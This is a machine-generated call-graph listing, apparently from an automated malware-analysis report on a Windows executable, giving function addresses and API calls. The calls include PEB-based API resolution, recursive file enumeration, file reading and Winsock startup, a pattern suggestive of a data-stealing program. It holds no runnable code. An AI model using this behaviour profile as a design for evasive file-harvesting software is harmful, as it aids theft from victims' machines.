10114->10116 10118 4036a3 4 API calls 10115->10118 10117 4036a3 4 API calls 10116->10117 10119 406781 10117->10119 10118->10104 10120 4036a3 4 API calls 10119->10120 10120->10104 10122 4031e5 4 API calls 10121->10122 10123 406468 10122->10123 10123->10090 10123->10091 9473 40c509 9474 412093 20 API calls 9473->9474 9475 40c51e 9474->9475 9482 40910d 9483 404b22 6 API calls 9482->9483 9484 409124 9483->9484 9485 40917a 9484->9485 9486 405b6f 6 API calls 9484->9486 9487 40913e 9486->9487 9489 404b22 6 API calls 9487->9489 9495 409173 9487->9495 9488 402bab 2 API calls 9488->9485 9490 409153 9489->9490 9491 40916a 9490->9491 9493 409408 15 API calls 9490->9493 9492 402bab 2 API calls 9491->9492 9492->9495 9494 409164 9493->9494 9496 402bab 2 API calls 9494->9496 9495->9488 9496->9491 9500 410410 9501 4056bf 2 API calls 9500->9501 9502 41041b 9501->9502 9503 412093 20 API calls 9502->9503 9504 41043c 9503->9504 9505 413aca 4 API calls 9504->9505 9506 410449 9505->9506 9507 405695 2 API calls 9506->9507 9508 410454 9507->9508 9535 40c71a 9536 41219c 14 API calls 9535->9536 9537 40c728 9536->9537 10179 410b1a 10180 404bee 6 API calls 10179->10180 10182 410b31 10180->10182 10181 410c6d 10182->10181 10183 404bee 6 API calls 10182->10183 10184 410b5a 10183->10184 10185 404bee 6 API calls 10184->10185 10186 410b69 10185->10186 10187 404bee 6 API calls 10186->10187 10188 410b78 10187->10188 10189 404ba7 4 API calls 10188->10189 10190 410b86 10189->10190 10191 404ba7 4 API calls 10190->10191 10192 410b95 10191->10192 10192->10181 10193 405872 4 API calls 10192->10193 10194 410bd7 10193->10194 10195 405872 4 API calls 10194->10195 10196 410be8 10195->10196 10197 405872 4 API calls 10196->10197 10198 410bf9 10197->10198 10199 405781 4 API calls 10198->10199 10200 410c07 10199->10200 10201 405781 4 API calls 10200->10201 10205 410c15 10201->10205 10202 410c4e 10203 405762 4 API calls 10202->10203 10204 410c60 10203->10204 10204->10181 10207 403f9e 5 API calls 10204->10207 10205->10202 10212 405e5a 10205->10212 10207->10181 10209 4040bb 12 API calls 10210 410c44 10209->10210 10211 402bab 2 API calls 10210->10211 10211->10202 10213 402b7c 2 API calls 10212->10213 10215 405e72 10213->10215 10214 405ea3 10214->10202 10214->10209 10215->10214 10216 4031e5 4 API calls 10215->10216 10217 405e94 10216->10217 10217->10214 10218 402bab 2 API calls 10217->10218 10218->10214 10219 40f81c 10220 404bee 6 API calls 10219->10220 10221 40f833 10220->10221 10222 404bee 6 API calls 10221->10222 10236 40f94f 10221->10236 10223 40f85c 10222->10223 10224 404bee 6 API calls 10223->10224 10225 40f86b 10224->10225 10226 404bee 6 API calls 10225->10226 10227 40f87a 10226->10227 10228 404bee 6 API calls 10227->10228 10229 40f888 10228->10229 10230 404ba7 4 API calls 10229->10230 10231 40f897 10230->10231 10232 405872 4 API calls 10231->10232 10231->10236 10233 40f8d8 10232->10233 10234 405872 4 API calls 10233->10234 10235 40f8ea 10234->10235 10237 405872 4 API calls 10235->10237 10238 40f8fa 10237->10238 10239 405872 4 API calls 10238->10239 10240 40f90c 10239->10240 10241 405781 4 API calls 10240->10241 10242 40f91d 10241->10242 10243 4040bb 12 API calls 10242->10243 10244 40f92d 10243->10244 10245 405762 4 API calls 10244->10245 10246 40f93f 10245->10246 10246->10236 10247 403f9e 5 API calls 10246->10247 10247->10236 9550 402c1f 9551 4031e5 4 API calls 9550->9551 9552 402c31 LoadLibraryW 9551->9552 10257 407e1f 10258 407e2c 10257->10258 10265 407e61 10257->10265 10260 407e3e 10258->10260 10263 402bab 2 API calls 10258->10263 10266 407e51 10258->10266 10259 407ea6 10261 407eb6 10259->10261 10264 402bab 2 API calls 10259->10264 10262 407ed4 10260->10262 10267 402bab 2 API calls 10260->10267 10261->10266 10268 402bab 2 API calls 10261->10268 10263->10260 10264->10261 10265->10259 10265->10261 10269 405872 4 API calls 10265->10269 10266->10262 10270 402bab 2 API calls 10266->10270 10267->10266 10268->10266 10271 407e86 10269->10271 10270->10262 10272 405872 4 API calls 10271->10272 10273 407e96 10272->10273 10274 405872 4 API calls 10273->10274 10274->10259 9565 405924 9566 4031e5 4 API calls 9565->9566 9567 405937 StrStrW 9566->9567 10283 410927 10284 4044ee 7 API calls 10283->10284 10285 41093d 10284->10285 10286 4056bf 2 API calls 10285->10286 10297 4109a4 10285->10297 10289 410954 10286->10289 10287 4044ee 7 API calls 10287->10289 10289->10287 10290 402bab 2 API calls 10289->10290 10291 410990 10289->10291 10298 41080e 10289->10298 10290->10289 10292 413aca 4 API calls 10291->10292 10293 410998 10292->10293 10294 405695 2 API calls 10293->10294 10295 41099e 10294->10295 10296 402bab 2 API calls 10295->10296 10296->10297 10299 410821 10298->10299 10309 41091f 10299->10309 10310 410701 10299->10310 10302 405872 4 API calls 10303 410900 10302->10303 10304 405872 4 API calls 10303->10304 10305 41090d 10304->10305 10306 405872 4 API calls 10305->10306 10307 410919 10306->10307 10308 402bab 2 API calls 10307->10308 10308->10309 10309->10289 10311 405f08 4 API calls 10310->10311 10313 410713 10311->10313 10312 410804 10312->10302 10312->10309 10313->10312 10314 402b7c 2 API calls 10313->10314 10318 410748 10314->10318 10315 4107fd 10316 402bab 2 API calls 10315->10316 10316->10312 10317 402b7c 2 API calls 10320 4107ad 10317->10320 10318->10315 10318->10317 10319 402bab 2 API calls 10319->10315 10320->10319 10321 40d726 10322 404bee 6 API calls 10321->10322 10323 40d73f 10322->10323 10324 40db63 10323->10324 10325 405872 4 API calls 10323->10325 10328 40d761 10325->10328 10326 404bee 6 API calls 10326->10328 10327 405872 4 API calls 10327->10328 10328->10326 10328->10327 10329 40d971 10328->10329 10330 404ba7 4 API calls 10329->10330 10331 405781 4 API calls 10329->10331 10336 40d9bb 10329->10336 10330->10329 10331->10329 10332 404c4e 6 API calls 10332->10336 10333 405781 4 API calls 10333->10336 10334 4037be 4 API calls 10334->10336 10335 405872 4 API calls 10335->10336 10336->10324 10336->10332 10336->10333 10336->10334 10336->10335 9623 40f12f 9624 41219c 14 API calls 9623->9624 9625 40f13f 9624->9625 9626 41219c 14 API calls 9625->9626 9627 40f14c 9626->9627 9628 41219c 14 API calls 9627->9628 9629 40f159 9628->9629 9630 41219c 14 API calls 9629->9630 9631 40f166 9630->9631 9638 40ed35 9639 4056bf 2 API calls 9638->9639 9640 40ed42 9639->9640 9641 412093 20 API calls 9640->9641 9642 40ed63 9641->9642 9643 412093 20 API calls 9642->9643 9644 40ed73 9643->9644 9645 413aca 4 API calls 9644->9645 9646 40ed80 9645->9646 9647 405695 2 API calls 9646->9647 9648 40ed8e 9647->9648 8092 40f3c5 8097 41219c 8092->8097 8095 41219c 14 API calls 8096 40f3e1 8095->8096 8098 4121b1 8097->8098 8105 40f3d3 8097->8105 8099 4121be 8098->8099 8103 4121c5 8098->8103 8145 413ba4 8099->8145 8100 4121ca 8115 404056 8100->8115 8103->8100 8108 412210 8103->8108 8104 4121c3 8104->8105 8122 405b6f 8104->8122 8105->8095 8108->8105 8150 403fbf 8108->8150 8110 402bab 2 API calls 8110->8105 8114 41224d 8114->8105 8114->8110 8161 402b7c GetProcessHeap RtlAllocateHeap 8115->8161 8117 404066 8119 404095 8117->8119 8163 4031e5 8117->8163 8119->8104 8121 402bab 2 API calls 8121->8119 8123 405b7d 8122->8123 8124 402b7c 2 API calls 8123->8124 8125 405b99 8124->8125 8131 405c02 8125->8131 8199 4059b8 8125->8199 8127 405c09 8129 402bab 2 API calls 8127->8129 8128 405bba 8128->8127 8130 402b7c 2 API calls 8128->8130 8129->8131 8132 405bdd 8130->8132 8131->8114 8135 413a58 8131->8135 8132->8127 8133 405be4 8132->8133 8134 402bab 2 API calls 8133->8134 8134->8131 8136 412245 8135->8136 8137 413a63 8135->8137 8158 402bab 8136->8158 8137->8136 8202 405781 8137->8202 8140 405781 4 API calls 8141 413aa0 8140->8141 8205 4057df 8141->8205 8144 405781 4 API calls 8144->8136 8146 413bad 8145->8146 8147 404056 6 API calls 8146->8147 8149 413bb8 8146->8149 8148 413bc5 8147->8148 8148->8104 8149->8104 8151 402b7c 2 API calls 8150->8151 8153 403fcf 8151->8153 8152 403ff4 8152->8104 8153->8152 8324 403b98 8153->8324 8156 403ff8 GetLastError 8157 402bab 2 API calls 8156->8157 8157->8152 8159 402bb4 GetProcessHeap HeapFree 8158->8159 8160 402bc6 8158->8160 8159->8160 8160->8114 8162 402b98 8161->8162 8162->8117 8164 4031f3 8163->8164 8165 403236 8163->8165 8164->8165 8168 403208 8164->8168 8174 4030a5 8165->8174 8167 403224 8169 403258 8167->8169 8171 4031e5 4 API calls 8167->8171 8180 403263 8168->8180 8169->8119 8169->8121 8171->8169 8172 40320d 8172->8169 8173 4030a5 4 API calls 8172->8173 8173->8167 8186 402ca4 8174->8186 8176 4030b0 8177 4030b5 8176->8177 8190 4030c4 8176->8190 8177->8167 8181 40326d 8180->8181 8182 402b7c 2 API calls 8181->8182 8185 4032b7 8181->8185 8183 40328c 8182->8183 8184 402b7c 2 API calls 8183->8184 8184->8185 8185->8172 8187 403079 8186->8187 8189 40307c 8187->8189 8194 40317b GetPEB 8187->8194 8189->8176 8192 4030eb 8190->8192 8193 4030c0 8192->8193 8196 402c03 8192->8196 8193->8167 8195 40319b 8194->8195 8195->8189 8197 4031e5 3 API calls 8196->8197 8198 402c15 GetProcAddress 8197->8198 8198->8193 8200 4031e5 4 API calls 8199->8200 8201 4059cb 8200->8201 8201->8128 8220 405797 8202->8220 8204 405792 8204->8140 8206 4057eb 8205->8206 8219 405832 8205->8219 8206->8219 8230 4040bb 8206->8230 8209 405839 8211 405853 8209->8211 8257 405627 8209->8257 8210 40582c 8254 403f9e 8210->8254 8268 405762 8211->8268 8218 403f9e 5 API calls 8218->8219 8219->8136 8219->8144 8221 4057a1 8220->8221 8222 4057bd 8220->8222 8221->8222 8224 4056fc 8221->8224 8222->8204 8225 405714 8224->8225 8226 402b7c 2 API calls 8225->8226 8227 405730 8226->8227 8228 402bab 2 API calls 8227->8228 8229 405752 8227->8229 8228->8229 8229->8222 8231 4031e5 4 API calls 8230->8231 8232 4040d5 CreateFileW 8231->8232 8233 4040f8 8232->8233 8234 40418d 8232->8234 8235 4031e5 4 API calls 8233->8235 8236 404183 8234->8236 8274 403c90 8234->8274 8242 404105 8235->8242 8236->8209 8236->8210 8236->8219 8240 40416d 8271 403c40 8240->8271 8242->8240 8246 4031e5 4 API calls 8242->8246 8244 4040bb 9 API calls 8250 4041c8 8244->8250 8245 402bab 2 API calls 8245->8236 8247 404131 VirtualAlloc 8246->8247 8247->8240 8248 404142 8247->8248 8249 4031e5 4 API calls 8248->8249 8251 40414f ReadFile 8249->8251 8250->8245 8251->8240 8252 404160 8251->8252 8253 4031e5 4 API calls 8252->8253 8253->8240 8255 4031e5 4 API calls 8254->8255 8256 403fb1 VirtualFree 8255->8256 8256->8219 8258 4031e5 4 API calls 8257->8258 8259 40563a 8258->8259 8260 405872 8259->8260 8262 405881 8260->8262 8261 4058bc 8263 405797 4 API calls 8261->8263 8265 4058af 8261->8265 8262->8261 8321 4058d4 8262->8321 8263->8265 8265->8211 8267 405781 4 API calls 8267->8261 8269 405781 4 API calls 8268->8269 8270 405770 8269->8270 8270->8218 8272 4031e5 4 API calls 8271->8272 8273 403c52 CloseHandle 8272->8273 8273->8236 8275 403ca3 8274->8275 8276 403caa 8274->8276 8301 405dc5 8275->8301 8278 404056 6 API calls 8276->8278 8281 403d3a 8276->8281 8279 403cbe 8278->8279 8280 403d2e 8279->8280 8282 403d17 8279->8282 8283 403ccf 8279->8283 8280->8281 8286 402bab 2 API calls 8280->8286 8281->8236 8297 403c59 8281->8297 8284 405b6f 6 API calls 8282->8284 8285 405b6f 6 API calls 8283->8285 8287 403d14 8284->8287 8288 403cdd 8285->8288 8286->8281 8290 402bab 2 API calls 8287->8290 8289 405b6f 6 API calls 8288->8289 8291 403cee 8289->8291 8290->8280 8291->8287 8306 403d4d 8291->8306 8294 403d0b 8296 402bab 2 API calls 8294->8296 8296->8287 8298 403c21 8297->8298 8299 4031e5 4 API calls 8298->8299 8300 403c33 8299->8300 8300->8244 8300->8250 8315 406799 8301->8315 8303 405dd5 8304 402b7c 2 API calls 8303->8304 8305 405dfe 8304->8305 8305->8276 8318 403bb7 8306->8318 8308 403cfe 8308->8294 8309 403c62 8308->8309 8310 403d4d 5 API calls 8309->8310 8311 403c6d 8310->8311 8312 403c72 8311->8312 8313 4031e5 4 API calls 8311->8313 8312->8294 8314 403c87 CreateDirectoryW 8313->8314 8314->8294 8316 4031e5 4 API calls 8315->8316 8317 4067ad 8316->8317 8317->8303 8319 4031e5 4 API calls 8318->8319 8320 403bc9 GetFileAttributesW 8319->8320 8320->8308 8322 405797 4 API calls 8321->8322 8323 4058a8 8322->8323 8323->8265 8323->8267 8325 4031e5 4 API calls 8324->8325 8326 403baa 8325->8326 8326->8152 8326->8156 9763 40ebc6 9764 4040bb 12 API calls 9763->9764 9765 40ebdf 9764->9765 9766 40ecd7 9765->9766 9783 407795 9765->9783 9769 40eccd 9770 403f9e 5 API calls 9769->9770 9770->9766 9771 4056bf 2 API calls 9781 40ec12 9771->9781 9772 40ecb5 9773 402bab 2 API calls 9772->9773 9774 40ecbd 9773->9774 9775 413aca 4 API calls 9774->9775 9776 40ecc7 9775->9776 9777 405695 2 API calls 9776->9777 9777->9769 9778 407908 GetProcessHeap RtlAllocateHeap 9778->9781 9780 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9780->9781 9781->9772 9781->9778 9781->9780 9782 402bab GetProcessHeap HeapFree 9781->9782 9794 412269 9781->9794 9782->9781 9785 4077ab 9783->9785 9784 4077b3 9784->9769 9784->9771 9785->9784 9801 405ae9 9785->9801 9787 4077e1 9787->9784 9788 407802 9787->9788 9789 4077f8 9787->9789 9791 402b7c 2 API calls 9788->9791 9790 402bab 2 API calls 9789->9790 9790->9784 9793 407811 9791->9793 9792 402bab 2 API calls 9792->9784 9793->9792 9817 40374e 9794->9817 9799 402bab 2 API calls 9800 412299 9799->9800 9800->9781 9802 405af7 9801->9802 9803 402b7c 2 API calls 9802->9803 9805 405b03 9803->9805 9804 405b5a 9804->9787 9805->9804 9814 405998 9805->9814 9807 405b21 9808 405b61 9807->9808 9810 402b7c 2 API calls 9807->9810 9809 402bab 2 API calls 9808->9809 9809->9804 9811 405b39 9810->9811 9811->9808 9812 405b40 9811->9812 9813 402bab 2 API calls 9812->9813 9813->9804 9815 4031e5 4 API calls 9814->9815 9816 4059ab 9815->9816 9816->9807 9818 402b7c 2 API calls 9817->9818 9820 40375f 9818->9820 9819 4037a3 9819->9800 9824 4037be 9819->9824 9820->9819 9821 4031e5 4 API calls 9820->9821 9822 40378f 9821->9822 9822->9819 9823 402bab 2 API calls 9822->9823 9823->9819 9825 4031e5 4 API calls 9824->9825 9826 4037e2 9825->9826 9827 40382b 9826->9827 9828 402b7c 2 API calls 9826->9828 9827->9799 9829 403802 9828->9829 9830 403832 9829->9830 9832 403809 9829->9832 9831 4036a3 4 API calls 9830->9831 9831->9827 9833 4036a3 4 API calls 9832->9833 9833->9827 8924 410cd1 8929 412093 8924->8929 8927 412093 20 API calls 8928 410cff 8927->8928 8931 4120a5 8929->8931 8950 410cf1 8929->8950 8930 4120b3 8932 404056 6 API calls 8930->8932 8931->8930 8935 412100 8931->8935 8933 4120ba 8932->8933 8934 405b6f 6 API calls 8933->8934 8937 412152 8933->8937 8933->8950 8940 412125 8934->8940 8936 403fbf 7 API calls 8935->8936 8935->8950 8936->8933 8951 403d74 8937->8951 8940->8937 8942 412139 8940->8942 8943 41214d 8940->8943 8941 41218c 8945 402bab 2 API calls 8941->8945 8941->8950 8947 402bab 2 API calls 8942->8947 8946 402bab 2 API calls 8943->8946 8944 402bab 2 API calls 8944->8941 8945->8950 8946->8937 8948 41213e 8947->8948 8949 402bab 2 API calls 8948->8949 8949->8950 8950->8927 8952 403d87 8951->8952 8953 403ea3 8952->8953 8954 405b6f 6 API calls 8952->8954 8955 405b6f 6 API calls 8953->8955 8956 403da3 8954->8956 8957 403eb9 8955->8957 8956->8953 8959 4031e5 4 API calls 8956->8959 8958 4031e5 4 API calls 8957->8958 8965 403f6f 8957->8965 8960 403ed3 FindFirstFileW 8958->8960 8961 403dbc FindFirstFileW 8959->8961 8977 403f8d 8960->8977 8981 403ee8 8960->8981 8972 403e9c 8961->8972 8982 403dd1 8961->8982 8962 402bab 2 API calls 8962->8965 8963 402bab 2 API calls 8963->8953 8964 4031e5 4 API calls 8966 403e84 FindNextFileW 8964->8966 8965->8941 8965->8944 8967 403e96 8966->8967 8966->8982 8991 403bef 8967->8991 8968 4031e5 4 API calls 8971 403f50 FindNextFileW 8968->8971 8970 405b6f 6 API calls 8970->8981 8974 403f87 8971->8974 8971->8981 8972->8963 8973 405b6f 6 API calls 8973->8982 8975 403bef 5 API calls 8974->8975 8975->8977 8976 403f75 8978 402bab 2 API calls 8976->8978 8977->8962 8980 403f7b 8978->8980 8979 403d74 15 API calls 8979->8982 8984 403bef 5 API calls 8980->8984 8981->8968 8981->8970 8981->8976 8985 402bab 2 API calls 8981->8985 8994 40fa23 8981->8994 8982->8964 8982->8973 8982->8979 8983 402bab 2 API calls 8982->8983 8986 403f63 8982->8986 8983->8982 8984->8965 8985->8981 8987 402bab 2 API calls 8986->8987 8988 403f69 8987->8988 8989 403bef 5 API calls 8988->8989 8989->8965 8992 4031e5 4 API calls 8991->8992 8993 403c01 FindClose 8992->8993 8993->8972 8995 40fa39 8994->8995 8996 410293 8995->8996 8997 405b6f 6 API calls 8995->8997 8996->8981 8998 40ffcc 8997->8998 8998->8996 8999 4040bb 12 API calls 8998->8999 9000 40ffeb 8999->9000 9001 41028c 9000->9001 9003 402b7c 2 API calls 9000->9003 9049 41027d 9000->9049 9002 402bab 2 API calls 9001->9002 9002->8996 9005 41001e 9003->9005 9004 403f9e 5 API calls 9004->9001 9006 40a423 4 API calls 9005->9006 9005->9049 9007 41004a 9006->9007 9008 4031e5 4 API calls 9007->9008 9009 41005c 9008->9009 9010 4031e5 4 API calls 9009->9010 9011 410079 9010->9011 9012 4031e5 4 API calls 9011->9012 9013 410096 9012->9013 9014 4031e5 4 API calls 9013->9014 9015 4100b0 9014->9015 9016 4031e5 4 API calls 9015->9016 9017 4100cd 9016->9017 9018 4031e5 4 API calls 9017->9018 9019 4100ea 9018->9019 9050 412516 9019->9050 9021 4100fd 9022 40642c 5 API calls 9021->9022 9023 41013e 9022->9023 9024 410142 9023->9024 9025 41019f 9023->9025 9026 40488c 5 API calls 9024->9026 9028 4031e5 4 API calls 9025->9028 9027 410151 9026->9027 9029 404866 4 API calls 9027->9029 9046 41019c 9027->9046 9039 4101bb 9028->9039 9033 410163 9029->9033 9030 40642c 5 API calls 9032 410201 9030->9032 9031 41022a 9035 413a58 13 API calls 9031->9035 9037 410205 9032->9037 9038 41022f 9032->9038 9034 406c4c 6 API calls 9033->9034 9047 41018e 9033->9047 9040 410178 9034->9040 9041 41026e 9035->9041 9036 403c40 5 API calls 9036->9046 9042 4126a7 7 API calls 9037->9042 9053 4125db 9038->9053 9044 4031e5 4 API calls 9039->9044 9045 406c4c 6 API calls 9040->9045 9048 402bab 2 API calls 9041->9048 9042->9031 9044->9046 9045->9047 9046->9030 9046->9031 9047->9036 9048->9049 9049->9004 9051 4031e5 4 API calls 9050->9051 9052 412539 9051->9052 9052->9021 9054 40488c 5 API calls 9053->9054 9055 4125ec 9054->9055 9056 4031e5 4 API calls 9055->9056 9060 41269f 9055->9060 9057 412609 9056->9057 9058 4031e5 4 API calls 9057->9058 9065 41268f 9057->9065 9061 41262a 9058->9061 9059 403c40 5 API calls 9059->9060 9060->9031 9062 412675 9061->9062 9070 4124f1 9061->9070 9063 4031e5 4 API calls 9062->9063 9063->9065 9065->9059 9067 412663 9069 4031e5 4 API calls 9067->9069 9068 4124f1 4 API calls 9068->9067 9069->9062 9071 4031e5 4 API calls 9070->9071 9072 412503 9071->9072 9072->9067 9072->9068 9259 4049dc 9260 4031e5 4 API calls 9259->9260 9261 4049ef 9260->9261 9916 40cddd 9917 405b6f 6 API calls 9916->9917 9918 40cdee 9917->9918 9919 40ce06 9918->9919 9920 413a58 13 API calls 9918->9920 9922 405b6f 6 API calls 9919->9922 9928 40ce59 9919->9928 9921 40ce00 9920->9921 9923 402bab 2 API calls 9921->9923 9924 40ce1c 9922->9924 9923->9919 9925 40ce52 9924->9925 9927 403d74 19 API calls 9924->9927 9924->9928 9926 402bab 2 API calls 9925->9926 9926->9928 9929 40ce45 9927->9929 9929->9925 9930 402bab 2 API calls 9929->9930 9930->9925 9262 40ecde 9263 412093 20 API calls 9262->9263 9264 40ecfd 9263->9264 9265 412093 20 API calls 9264->9265 9266 40ed0d 9265->9266 9270 40e8df 9271 412093 20 API calls 9270->9271 9272 40e8f8 9271->9272 9273 412093 20 API calls 9272->9273 9274 40e908 9273->9274 9281 404b22 9274->9281 9276 40e91c 9277 40e936 9276->9277 9280 40e93d 9276->9280 9288 40e944 9276->9288 9279 402bab 2 API calls 9277->9279 9279->9280 9282 402b7c 2 API calls 9281->9282 9284 404b33 9282->9284 9283 404b66 9283->9276 9284->9283 9297 4049b3 9284->9297 9287 402bab 2 API calls 9287->9283 9289 4056bf 2 API calls 9288->9289 9290 40e952 9289->9290 9291 4057df 13 API calls 9290->9291 9296 40e976 9290->9296 9292 40e966 9291->9292 9293 413aca 4 API calls 9292->9293 9294 40e970 9293->9294 9295 405695 2 API calls 9294->9295 9295->9296 9296->9277 9298 4031e5 4 API calls 9297->9298 9299 4049c6 9298->9299 9299->9283 9299->9287 9300 4139de 9309 413855 9300->9309 9302 4139f1 9303 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9302->9303 9304 4139f7 9303->9304 9305 413866 58 API calls 9304->9305 9306 413a2d 9305->9306 9307 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9306->9307 9308 413a34 9307->9308 9310 4031e5 4 API calls 9309->9310 9311 413864 9310->9311 9311->9311 9936 4116e7 9937 4117ba 9936->9937 9938 405b6f 6 API calls 9937->9938 9943 4117f1 9937->9943 9939 4117d0 9938->9939 9940 404cbf 8 API calls 9939->9940 9939->9943 9941 4117eb 9940->9941 9942 402bab 2 API calls 9941->9942 9942->9943 9331 4094e7 9332 404b22 6 API calls 9331->9332 9333 4094fe 9332->9333 9334 409554 9333->9334 9335 405b6f 6 API calls 9333->9335 9336 409514 9335->9336 9337 404b22 6 API calls 9336->9337 9344 40954d 9336->9344 9339 40952d 9337->9339 9338 402bab 2 API calls 9338->9334 9340 409544 9339->9340 9341 409408 15 API calls 9339->9341 9342 402bab 2 API calls 9340->9342 9343 40953e 9341->9343 9342->9344 9345 402bab 2 API calls 9343->9345 9344->9338 9345->9340 9354 4058ea 9355 4031e5 4 API calls 9354->9355 9356 4058fd StrStrA 9355->9356 9988 40d4ea 9989 404bee 6 API calls 9988->9989 9991 40d500 9989->9991 9990 40d5a0 9991->9990 9992 404bee 6 API calls 9991->9992 9993 40d529 9992->9993 9994 404bee 6 API calls 9993->9994 9995 40d537 9994->9995 9996 404bee 6 API calls 9995->9996 9997 40d546 9996->9997 9997->9990 9998 405872 4 API calls 9997->9998 9999 40d56d 9998->9999 10000 405872 4 API calls 9999->10000 10001 40d57c 10000->10001 10002 405872 4 API calls 10001->10002 10003 40d58e 10002->10003 10004 405872 4 API calls 10003->10004 10004->9990 10005 40a3ea 10006 40374e 6 API calls 10005->10006 10007 40a403 10006->10007 10008 40a419 10007->10008 10009 4059d8 4 API calls 10007->10009 10010 40a411 10009->10010 10011 402bab 2 API calls 10010->10011 10011->10008 9394 404df3 WSAStartup 9398 4091f6 9399 404b22 6 API calls 9398->9399 9400 40920b 9399->9400 9401 409222 9400->9401 9402 409408 15 API calls 9400->9402 9403 40921c 9402->9403 9404 402bab 2 API calls 9403->9404 9404->9401 10038 4117fe 10039 404c4e 6 API calls 10038->10039 10040 411888 10039->10040 10041 404c4e 6 API calls 10040->10041 10046 411925 10040->10046 10042 4118ab 10041->10042 10042->10046 10057 4119b3 10042->10057 10044 4118c5 10045 4119b3 4 API calls 10044->10045 10047 4118d0 10045->10047 10047->10046 10048 4056bf 2 API calls 10047->10048 10049 4118fd 10048->10049 10050 405872 4 API calls 10049->10050 10051 41190a 10050->10051 10052 405872 4 API calls 10051->10052 10053 411915 10052->10053 10054 413aca 4 API calls 10053->10054 10055 41191f 10054->10055 10056 405695 2 API calls 10055->10056 10056->10046 10058 4119c6 10057->10058 10060 4119bf 10057->10060 10059 4031e5 4 API calls 10058->10059 10059->10060 10060->10044 9408 40e880 9409 41219c 14 API calls 9408->9409 9410 40e88e 9409->9410 9411 41219c 14 API calls 9410->9411 9412 40e89c 9411->9412 10124 40e48a 10125 404bee 6 API calls 10124->10125 10126 40e4d0 10125->10126 10127 405872 4 API calls 10126->10127 10128 40e4f4 10126->10128 10127->10128 9509 410390 9510 404b22 6 API calls 9509->9510 9511 4103a5 9510->9511 9512 410409 9511->9512 9513 405b6f 6 API calls 9511->9513 9518 4103ba 9513->9518 9514 410402 9515 402bab 2 API calls 9514->9515 9515->9512 9516 4103fb 9517 402bab 2 API calls 9516->9517 9517->9514 9518->9514 9518->9516 9519 403d74 19 API calls 9518->9519 9520 4103ee 9519->9520 9520->9516 9521 402bab 2 API calls 9520->9521 9521->9516 10139 40ed96 10140 4040bb 12 API calls 10139->10140 10154 40edb0 10140->10154 10141 40ef90 10142 40ef87 10143 403f9e 5 API calls 10142->10143 10143->10141 10144 405ae9 6 API calls 10144->10154 10145 412269 6 API calls 10145->10154 10146 40ef61 10149 40ef6e 10146->10149 10150 402bab 2 API calls 10146->10150 10147 402bab GetProcessHeap HeapFree 10147->10154 10148 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10148->10154 10151 40ef7c 10149->10151 10152 402bab 2 API calls 10149->10152 10150->10149 10151->10142 10153 402bab 2 API calls 10151->10153 10152->10151 10153->10142 10154->10141 10154->10142 10154->10144 10154->10145 10154->10146 10154->10147 10154->10148 10155 40ef98 10156 404c4e 6 API calls 10155->10156 10157 40efb6 10156->10157 10158 40f02a 10157->10158 10170 40f054 10157->10170 10161 404bee 6 API calls 10162 40efda 10161->10162 10163 404bee 6 API calls 10162->10163 10164 40efe9 10163->10164 10164->10158 10165 405872 4 API calls 10164->10165 10166 40f008 10165->10166 10167 405872 4 API calls 10166->10167 10168 40f01a 10167->10168 10169 405872 4 API calls 10168->10169 10169->10158 10171 40f064 10170->10171 10172 402b7c 2 API calls 10171->10172 10174 40f072 10172->10174 10173 40efca 10173->10161 10174->10173 10176 405ecd 10174->10176 10177 4059b8 4 API calls 10176->10177 10178 405edf 10177->10178 10178->10174 9528 410c98 9529 41219c 14 API calls 9528->9529 9530 410ca8 9529->9530 9531 41219c 14 API calls 9530->9531 9532 410cb5 9531->9532 9533 412093 20 API calls 9532->9533 9534 410cc9 9533->9534 10248 41249c 10249 4056bf 2 API calls 10248->10249 10250 4124aa 10249->10250 10251 4057df 13 API calls 10250->10251 10256 4124ce 10250->10256 10252 4124be 10251->10252 10253 413aca 4 API calls 10252->10253 10254 4124c8 10253->10254 10255 405695 2 API calls 10254->10255 10255->10256 9538 40f49e 9539 40f4b6 13 API calls 9538->9539 9540 40f4a8 9539->9540 9541 40929e 9542 413b28 6 API calls 9541->9542 9543 4092a4 9542->9543 9544 405b6f 6 API calls 9543->9544 9545 4092af 9544->9545 9546 4092c5 9545->9546 9547 409408 15 API calls 9545->9547 9548 4092bf 9547->9548 9549 402bab 2 API calls 9548->9549 9549->9546 10275 407fa4 10276 407fb7 10275->10276 10277 402b7c 2 API calls 10276->10277 10279 407fee 10276->10279 10278 40800d 10277->10278 10278->10279 10280 4037be 4 API calls 10278->10280 10281 40803c 10280->10281 10282 402bab 2 API calls 10281->10282 10282->10279 9586 4090aa 9587 404b22 6 API calls 9586->9587 9588 4090c1 9587->9588 9589 409408 15 API calls 9588->9589 9595 4090d8 9588->9595 9591 4090d2 9589->9591 9590 404b22 6 API calls 9592 4090eb 9590->9592 9593 402bab 2 API calls 9591->9593 9594 408c4d 15 API calls 9592->9594 9598 409104 9592->9598 9593->9595 9596 4090fe 9594->9596 9595->9590 9597 402bab 2 API calls 9596->9597 9597->9598 9605 409cae 9620 404b79 9605->9620 9607 409cc5 9608 409d27 9607->9608 9610 405b6f 6 API calls 9607->9610 9611 409d2f 9607->9611 9609 402bab 2 API calls 9608->9609 9609->9611 9612 409cec 9610->9612 9612->9608 9613 404b79 6 API calls 9612->9613 9614 409d05 9613->9614 9615 409d1e 9614->9615 9616 408c4d 15 API calls 9614->9616 9617 402bab 2 API calls 9615->9617 9618 409d18 9616->9618 9617->9608 9619 402bab 2 API calls 9618->9619 9619->9615 9621 404b22 6 API calls 9620->9621 9622 404b8a 9621->9622 9622->9607 10342 411fb3 10343 405b6f 6 API calls 10342->10343 10345 412013 10343->10345 10344 412075 10345->10344 10346 41206a 10345->10346 10361 411a8d 10345->10361 10348 402bab 2 API calls 10346->10348 10348->10344 10350 4056bf 2 API calls 10351 41203d 10350->10351 10352 405872 4 API calls 10351->10352 10353 41204a 10352->10353 10354 413aca 4 API calls 10353->10354 10355 412054 10354->10355 10356 405695 2 API calls 10355->10356 10357 41205a 10356->10357 10358 413a58 13 API calls 10357->10358 10359 412064 10358->10359 10360 402bab 2 API calls 10359->10360 10360->10346 10362 402b7c 2 API calls 10361->10362 10364 411aa3 10362->10364 10363 411f05 10363->10346 10363->10350 10364->10363 10384 404ada 10364->10384 10367 404ada 4 API calls 10368 411cad 10367->10368 10369 411f0c 10368->10369 10370 